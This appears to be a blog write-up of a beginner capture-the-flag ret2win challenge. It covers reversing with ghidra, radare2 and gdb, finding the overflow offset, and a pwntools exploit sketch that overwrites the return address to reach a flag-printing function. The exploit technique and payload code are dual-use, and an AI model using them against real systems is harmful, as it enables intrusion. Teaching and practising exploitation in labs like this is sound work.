Intro
Mr. Snowy was the binary exploitation/pwn challenge released on day 1, and was a classic stack-based buffer overflow, specifically what many call a “ret2win” challenge. After looking at the initial behavior, we’ll go into some well-known reverse engineering and debugging tools, ghidra, radare2, and gdb, and find a function (our “win” function) that will print the flag. With all of this together, we can use the pwntools
library to write a quick exploit that overwrites the saved return address with the address of the win function, so that RIP lands there and the flag is printed.
Description
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.
Initial Observations
Enumeration
We’ve done a stack-based buffer overflow on this blog before, but binary exploitation challenges usually require you to dig a bit deeper than just “spike every possible input”, so we’ll do that first.
From our file
command, we learn that the binary is a 64-bit ELF file, which isn’t too crazy. As for the other command, checksec
comes from the pwntools toolkit, a “CTF framework and exploit development library” that makes exploit development easy. It’ll return some information on the architecture and memory protections of the program. A brief explanation of each:
- RELRO stands for Relocation Read-Only, which is currently out of scope of my knowledge (still haven’t studied binary exploitation that deep), but you can read more here
- Stack Canaries come from the old practice of leaving a canary at the opening of a coal mine. If the canary stopped chirping, that meant there were noxious gasses and the miners needed to leave (dark, I know). Here, they detect stack overflows: a random value is placed on the stack in front of the saved return address and checked before the function returns. If an overflow has changed it, the program shuts down before something bad happens.
- NX is short for non-executable. If this is enabled, this means memory segments can either be written to or executed, but not both. Simply put, we can’t put shellcode on the stack and expect it to execute.
- PIE stands for Position Independent Executable. If enabled, the binary itself is loaded at a randomized base address (when ASLR is on), so the addresses of its functions change between runs, making it harder to rely on how memory is mapped out.
Coming back to checksec
, we don’t really have to worry about RELRO because this is a beginner challenge, but NX being enabled means we probably won’t get a shell by dropping shellcode on the stack.
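To make the first two facts a little less magical, here is a minimal sketch (plain Python 3, standard library only) of how the "64-bit" and "PIE" answers can be read straight out of the ELF header. The function name `describe_elf_header` and the hand-built `sample` header are made up for illustration; this is not how checksec itself is implemented, and it says nothing about RELRO, canaries, or NX.

```python
import struct

def describe_elf_header(header: bytes) -> dict:
    """Decode the few ELF header fields that answer '32 or 64 bit?' and 'PIE?'."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = header[4]  # 1 = 32-bit, 2 = 64-bit
    ei_data = header[5]   # 1 = little-endian, 2 = big-endian
    endian = "<" if ei_data == 1 else ">"
    # e_type is a 16-bit field right after the 16-byte e_ident array:
    # 2 = ET_EXEC (fixed load address), 3 = ET_DYN (PIE or shared object)
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return {
        "bits": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "pie": e_type == 3,
    }

# Hand-built 18-byte header: 64-bit, little-endian, ET_EXEC (illustrative only).
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<H", 2)
print(describe_elf_header(sample))
```

To try it on a real file, pass the first 18 bytes, for example `describe_elf_header(open("./mr_snowy", "rb").read(18))`, assuming the binary sits in the current directory.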
Running the Program
The program plays like a “choose your own adventure”, but you lose no matter what you do (says something about society I guess).
If you “Let it be”, you lose. If you “Deactivate”, you don’t know the password, and lose. If you “Break it”, it’s said to be “unbreakable”, and you lose. What gives?
Decompiling, Disassembling, and Reversing
Before continuing, I’ll preface everything here as being a little bit overkill. We’re going to go over ghidra, radare2, and gdb, but you really only need gdb for this challenge because spoiler: it’s just a buffer overflow. But, because it’s good practice, we’ll briefly touch on each of these tools.
ghidra
ghidra is a tool developed by the NSA for analyzing binaries, mostly known for its decompiler, which tries to recover the C code from the assembly code. However, as a warning, ghidra is not perfect. The process of “decompiling” is looking at the assembly code and guessing what the original code might have been. With this in mind, you’ll have to do some cleaning of your own, especially if a program is longer.
Explaining all of ghidra’s functions is enough for its own standalone post, but for now, we’ll make a new, non-shared project, import the mr_snowy
file, and just follow along with the default settings.
Once we have the CodeBrowser open, things can look a little intimidating at first. For the time being, all we have to focus on is the “Functions” folder in the “Symbol Tree”, the assembler code in the middle, and the code display on the right. If we click on main
in the “Functions” folder, ghidra returns this.
We can follow each of these functions by clicking on them. The setup()
function sets up the initial buffer for user input (not important right now), and banner()
is just the snowman we see every time we run the program. If we click on snowman()
, we get this:
You can now see how the decompiling isn’t the cleanest. There’s one more function explicitly in the code, investigate()
.
So far, we haven’t found any sign of a flag. However, there’s an additional function listed that doesn’t show up in the primary flow of logic.
When we run the program as-is, we never touch this function, but this is the function that contains the flag. Although I haven’t really explained any of the code, we can tell that there’s probably a buffer overflow (because of the unchecked user input in investigate()
). While we can’t insert shellcode, we could overwrite the instruction pointer to point at this function. We can use ghidra to find the address of the function in memory, but I’d rather highlight some other tools that you could use before we get to writing the exploit.
radare2
Radare2 is a tool for analyzing a variety of things, not just binaries, but is mainly used for its disassembler. While it doesn’t try and recreate C from the assembly code, it tends to not make assumptions, and can give a more accurate look at the flow of logic, if you’re comfortable looking at assembler. Again, there are many, many things that this tool can do, but we’ll keep it simple for now. We can start using radare2 by calling it from the command line like so.
You can run r2 without the -A
flag, but I include it to start the analysis immediately. We can use s main
to “seek to main”, and then run pdf
to disassemble the function.
Note how this looks similar to the ghidra output. We can get a list of the functions used in the program by running afl
.
Note that this more clearly displays where each function is in memory. If we wanted to seek to the sym.deactivate_camera
function, we can run s sym.deactivate_camera
, followed by a pdf
again (or run pdf @ sym.deactivate_camera
). I’ll skip the output for brevity’s sake.
The last command that may be useful is running izz
, which is like running strings
on the binary, but just a little bit smarter. Now that we know what we’re looking at, let’s look at gdb and developing the exploit with pwntools.
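As a short aside on what strings (and, roughly, izz) is doing under the hood: the core idea is just scanning the file for runs of printable bytes. The sketch below is a simplified illustration in Python 3, not radare2's actual logic; the helper name `ascii_strings` and the `blob` test data are invented for the example.

```python
import re

def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of at least min_len printable ASCII bytes, like a basic `strings`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]

# Made-up bytes standing in for a binary: two long runs and some short noise.
blob = b"\x00\x01flag.txt\x00\x7fELF\x02AB\x00Unbreakable\x00"
print(ascii_strings(blob))
```

Runs shorter than `min_len` (here "ELF" and "AB") are dropped, which is why the output of strings is mostly readable text rather than random three-letter fragments.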
Exploit Development
gdb
GDB, or the GNU Debugger, is a debugger for Unix-like operating systems that supports a variety of languages; it’s basically what we’ll use instead of Immunity Debugger or WinDbg. For pwn challenges, I also like using an additional plugin known as pwndbg, which simplifies some of the syntax and makes the output easier to look at. We can start the program with r
, to run it. If we wanted to redirect input into the program, we can do r < INPUT
, like how it normally works in Linux.
I’ll start by trying to spike the program at both inputs, and find that only the second user input is susceptible to overflow.
Since this is a 64-bit program, the registers are larger, so we’re dealing with RIP instead of EIP and RSP instead of ESP. Additionally, as opposed to the overflow we saw in Brainstorm, RIP won’t show our junk after the crash: a value like 0x4141414141414141 is not a canonical 64-bit address, so the ret instruction faults before RIP is updated, and the overwritten return address is left sitting at the top of the stack (RSP) instead (this troubled me for a little bit). Normally, we would determine the exact offset using a cyclic string, but since we’ve already seen the decompiled code, we know that a buffer of 64 bytes is allocated for user input. Add the 8 bytes of saved RBP that normally sit between the buffer and the return address, and it takes 72 bytes of padding to reach the saved RIP.
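For completeness, here is roughly what the cyclic-string approach looks like. pwntools ships `cyclic` and `cyclic_find` for this; the sketch below is a standard-library stand-in (Python 3) that uses the older "Aa0Aa1Aa2..." style of pattern instead, so it is not the pwntools algorithm. The names `make_pattern` and `find_offset` are made up, and the "crash value" is simulated from the 72-byte offset worked out above rather than taken from a real debugger session.

```python
import string
import struct

def make_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("requested length exceeds what this pattern can cover")

def find_offset(pattern: bytes, qword_from_stack: int) -> int:
    """Locate the 8 bytes seen at the top of the stack (read as a little-endian integer)."""
    return pattern.find(struct.pack("<Q", qword_from_stack))

pattern = make_pattern(200)
# Simulated crash: pretend the debugger showed these 8 pattern bytes at RSP.
simulated = struct.unpack("<Q", pattern[72:80])[0]
print(find_offset(pattern, simulated))
```

In a real session you would feed the pattern to the vulnerable input, read the 8 bytes at RSP after the crash, and pass that value to `find_offset`.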
Aside from this, all we really need is the memory address of the deactivate_camera()
function. I’ve already shown two tools you can use to locate this, but pwndbg lets us do this in two different ways. We can run info functions
to get a list of all functions.
Or we can use print &deactivate_camera
for the specific function that we want.
We also could have disassembled any of these functions in pwndbg using disassemble FUNCTION
. I encourage you to read through the documentation and learn more.
pwntools
Now, we can finally get to writing the exploit. The tricky thing here is not actually writing it (all we have to do is send 72 bytes of padding followed by a return address), but getting past all of the cosmetic additions. Luckily, pwntools
simplifies this process with a variety of functions. I’ll show you the code and then explain it afterwards.
This is a stripped down version of the code that CryptoCat used in his walkthrough of Reg on HackTheBox, because it’s a good template to work off of (note that it is in python2 because that’s just what pwn authors like using). To sum things up:
- We set a log level for debugging the exploit.
- We tell pwntools what kind of architecture we’re working with in the line where we assign stuff to elf.
- We start the process, and use flat() to flatten our arguments into a string. We don’t even have to rewrite our RIP in little-endian, pwntools takes care of that.
- We use sendlineafter() to avoid playing with recv()s, and just specify at what point we want data to be sent.
- And then we get the flag!
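The steps above can be sketched roughly as follows. This is my own minimal Python 3 reconstruction, not the python2 template referenced above: the payload is packed by hand with struct instead of flat() so the little-endian step is visible, and the prompt string `b"> "`, the menu choice `b"1"`, and the path `./mr_snowy` are assumptions that need to be adjusted to what the binary actually prints. The address `0x401234` in the demo line is a placeholder, not the real address of deactivate_camera.

```python
import struct

OFFSET = 72  # padding needed to reach the saved return address, per the write-up

def build_payload(win_addr: int, offset: int = OFFSET) -> bytes:
    """Padding up to the saved return address, then the target address in little-endian."""
    return b"A" * offset + struct.pack("<Q", win_addr)

def run_exploit(path: str = "./mr_snowy"):
    """Drive the local binary with pwntools (requires pwntools and the challenge file)."""
    # Imported here so build_payload() can be used without pwntools installed.
    from pwn import ELF, context, process

    context.log_level = "debug"
    elf = context.binary = ELF(path, checksec=False)  # sets arch/bits from the file
    io = process(path)  # against the remote target: remote(HOST, PORT) instead
    io.sendlineafter(b"> ", b"1")  # ASSUMPTION: prompt text and first menu choice
    io.sendlineafter(b"> ", build_payload(elf.symbols["deactivate_camera"]))
    io.interactive()

# Placeholder address, only to show the shape of the payload.
demo = build_payload(0x401234)
print(len(demo), demo[-8:])
```

Calling `run_exploit()` from the directory containing the binary should then walk through the prompts and hand control to deactivate_camera(), provided the assumed prompts match.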
Grabbing the Flag
Locally, we get this:
(I have a virtual environment for pwntools in python2, hence the “env”.)
The neat thing about pwntools is that we can just swap the process() call for remote(), specifying the address and port, while the rest of our syntax can stay the same. Running the exploit against the remote target, we get the flag.
Additional Resources
Binary exploitation goes very, very deep, and I’m excited to begin learning about it when I have time. If you want to learn more, here are some resources:
- Nightmare - Intro to Pwn/Rev
- ir0nstone’s pwn notes
- THM Intro to pwntools
- CryptoCat YouTube
- LiveOverflow YouTube
Apologies if this post was a little more verbose than it really needed to be, but I hope you learned something, or remembered something, or found something I said wrong and are able to correct me :)